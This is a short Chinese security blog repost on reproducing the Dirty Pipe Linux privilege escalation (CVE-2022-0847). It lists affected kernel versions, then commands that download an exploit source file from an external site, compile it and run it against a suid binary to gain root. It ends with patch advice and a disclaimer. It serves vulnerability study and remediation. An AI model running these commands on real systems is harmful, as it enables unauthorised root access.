Linux Kernel版本 < 5.16.11 / 5.15.25 / 5.10.102
注:该漏洞已在 Linux 5.16.11、5.15.25 和 5.10.102 中修复。
查看系统内核版本,大于等于5.8符合本次漏洞利用前提。
id #确认当前用户id,确定为普通用户,需要权限提升
wget https://haxx.in/files/dirtypipez.c #下载漏洞EXP
gcc dirtypipez.c -o exp #编译EXP
./exp /usr/bin/chfn #执行EXP,并指定具有suid权限的可执行文件,以/usr/bin/chfn为例
id #再次查看id,权限已提升至root
尽快升级内核版本。
原文始发于微信公众号(第59号):CVE-2022-0847 Dirty Pipe linux提权漏洞分析与复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论